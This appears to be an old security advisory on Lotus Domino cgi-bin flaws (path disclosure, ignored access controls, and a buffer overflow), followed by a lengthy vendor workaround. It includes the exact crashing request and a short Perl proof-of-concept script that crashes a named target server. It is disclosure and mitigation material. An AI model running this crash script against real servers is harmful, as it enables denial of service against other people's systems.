COMMAND

    Lotus Domino

SYSTEMS AFFECTED

    Lotus Domino

PROBLEM

    Alain Thivillon found following.  Lotus Domino HTTP server can  be
    used as a traditional Web  server, with static html documents  and
    cgi-bin  scripts  handling.  These  features  are  turned  on   by
    default,   and   use    /cgi-bin   virtual    path,   mapped    to
    <NOTESDATA>\domino\cgi-bin directory.   When doing audit  of these
    functions,  he  found  three  vulnerabilites  in  handling  of cgi
    requests:

    1. Domino server exposes configuration of local filesystem:
    ===========================================================
    When requesting http://server/cgi-bin/blabla, HTTP response is

        Error 500
        Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/blabla' is executable

    This can be used to obtain OS and installation details.

    2. Turning off anonymous access in server document of Notes Name &
       Adress Book as no effect for cgi-bin directory :
    ==================================================================
    anonymous  access  is  still  permitted.  The same applies to "SSL
    redirection of entire server" : cgi-bin can still be accessed  via
    HTTP port.

    3. Now the worst ...
    ====================
    Handling of response  to bad requests  (see 1) is  vulnerable to a
    buffer overflow  : by  sending a  large URL  relative to  cgi-bin,
    HTTP  task  crashes  immediatly,  and  does  not  service requests
    anymore (including standard  Notes database access  by HTTP).   If
    Domino  is  launched  as  a  NT  service,  service  will  not stop
    completly, you  need to  kill remaining  processes (using kill.exe
    in Reskit) or reboot Windows NT.  We notice that all requests does
    not crash server, but sending

        GET /cgi-bin/... (800 .) aaaa (4000 a) HTTP/1.0

    kills nHTTP.exe every time.   Testers were able to reproduce  this
    on all 4.6.X series, including 4.6.6b, wich seems the last version
    accessible on www.notes.net.  Buffer overflow is maybe exploitable
    to execute arbitrary  code.  On  Unix versions problems  1. and 2.
    are present.  The same remark applies to Domino 5.x.

    Demonstration script  using Perl  LWP module  is given  below.   A
    nessus plugin will be available thanks to Renaud Deraison on

        http://www.nessus.org/

    Demonstration script:

    #!/usr/bin/perl -w
    # This will crash Lotus Domino Server (tested on 4.6.4,4.6.5,4.6.6 and
    # 4.6.6b).
    # (c) Alain Thivillon, Stephane Aubert and Herve Schauer Consultants 1999

    use LWP::UserAgent;

    $ua = new LWP::UserAgent;
    $ua->agent("a");

    $target='Insertyourtargetnamehere';

    $url="http://".$target."/cgi-bin/".'.'x800;
    $url.='a'x4000;
    my $req = new HTTP::Request GET => $url;

    my $res = $ua->request($req);

    if ($res->is_success) {
      print $res->content;
    }
    else {
      print "Well done, Joe\n";
    }

SOLUTION

    If you  don't use  cgi-bin on  your Domino  server, change cgi-bin
    virtual directory  in server  document to  something impossible to
    guess.  Leaving field empty has  no effect.

    The  buffer  overflow  problem  in  notes  as  mentioned  by Alain
    Thivillion can be  worked around if  you don't use  cgi-scripts at
    all, or are prepared to do a bit of work for all the scripts  that
    are on the server (posted bz Bram Kerkhof).

    The procedure (Lotus Notes knowledgebase):
      The workaround  in versions  prior to  4.6.1 is  to create a URL
      redirect in the DOMCFG.NSF database that redirects any anomalous
      CGI requests to  another URL. Since  any non-existent CGI  calls
      can cause this error, the following workaround is suggested.

      * If the customer  does not require the  use of any CGI's,  then
        the entire /cgi-bin directory can be redirected to another URL
        (a Notes database, or  html file). If any  "/cgi-bin" requests
        are  made,  they  will  be  directed  to  this URL and are not
        processed as CGI.

      * If the  customer does require  the use of  CGI's the following
        setup will be required:

        1) In the HTTP section of the Server Document, change the "CGI
           URL path"  field to  a different  URL path.  This does  not
           require a change for  the "CGI directory" field,  such that
           the location on  the hard drive  for CGI's will  remain the
           same.  Only the URL which invokes CGI's will be altered.

           Example: The  default CGI  URL path  is "/cgi-bin";  change
           this  to  "/scripts/cgi-bin".  Now,  whenever  a   /cgi-bin
           request is  made, it  is recognized  as a  URL instead of a
           CGI.

        2) Create a URL Redirect  document in the DOMCFG.NSF for  each
           specific  CGI  that  resides  on  the  server.  Specify the
           incoming URL path as "/cgi-bin", and the redirection URL as
           "/scripts/cgi-bin".

           Example:  A  customer  has  a  CGI  named "Xrun.cgi" in the
           domino/cgi-bin  directory.  Regularly,   any  requests   to
           execute     the      CGI     would      come     in      as
           "http://hostname/cgi-bin/Xrun.cgi".   This  URL  request is
           redirected  to  "http://hostname/scripts/cgi-bin/Xrun.cgi",
           where  Domino  will  recognize  it  as  a  CGI, and run the
           script.   In this  case, the  "/cgi-bin" URL  itself is not
           recognized as a  CGI request.   It is only  the redirection
           to "/scripts/cgi-bin" that will cause the Domino server  to
           process it as a CGI script

      At this point, any  generic requests for CGI's  using "/cgi-bin"
      will not  be recognized  as CGI.  Instead, the  Web server  will
      search for a comparable filename, returning "Error 404- file not
      found" since  it is  not capable  of finding  such a  URL.   The
      customer can now  customize the error  message to indicate  that
      the requested CGI does not reside on the server.

    The above configuration is designed to accomplish the following:
    * Since the current  Domino 4.6 Server code  may crash any time  a
      non-existent CGI is requested, the potential to run non-existent
      CGI's  must  be  removed.   By  this configuration anomalous CGI
      requests are not recognized as CGI scripts, and Domino will  not
      attempt to run them.

    * The CGI  URL path is  altered so that  only CGI's using  the URL
      "/scripts/cgi-bin..."  will   be  recognized   as  CGI's.    The
      administrator  then  creates  a  URL  redirect document for each
      present  CGI  that  redirects  any  valid URL requests using the
      syntax  "/cgi-bin..."  to  the  URL  "/scripts/cgi-bin...".  The
      Domino Server will then invoke the CGI script.  This will  avoid
      the Domino Server attempting to run a CGI that is not present on
      the server, running only valid CGI's.

    * Since the  URL redirect does  not display the  redirected URL to
      the browser, end users need not  ever know the true URL path  to
      invoke  CGI  scripts.   This  further  protects  the  site  from
      unscrupulous web  clients deliberately  attempting to  crash the
      server by requesting to invoke a non-existent URL.  Such a  user
      would need to know  the exact URL path  to issue for the  server
      to recognize it is  a request for a  CGI, and would have  no way
      to determine this URL under a secure site.

    It  means  that  you  have  to  set your cgi-bin path to something
    which is, as Alain stated,  unguessable, but has the advantage  of
    not  disclosing  this  path  to  the  visitors  of  the  site  and
    maintainig  the  possibility  to  run  CGI's  if needed.  The full
    knowledgebase article is available at

        http://www.support.lotus.com/sims2.nsf/0/6ecb87e6e6820b008525659f0080d40c?OpenDocument

    The described  workaround does  work for  Notes-Servers not  using
    CGI at all.   However, there is  still a problem  with hiding  the
    cgi's in a different script  directory.  Notes sends the  ,,real''
    script directory in the  Content-Base-Field of the header.   Using
    this  information,  the  machine  can  still  be  crashed  (tested
    successfully on 4.6.2a).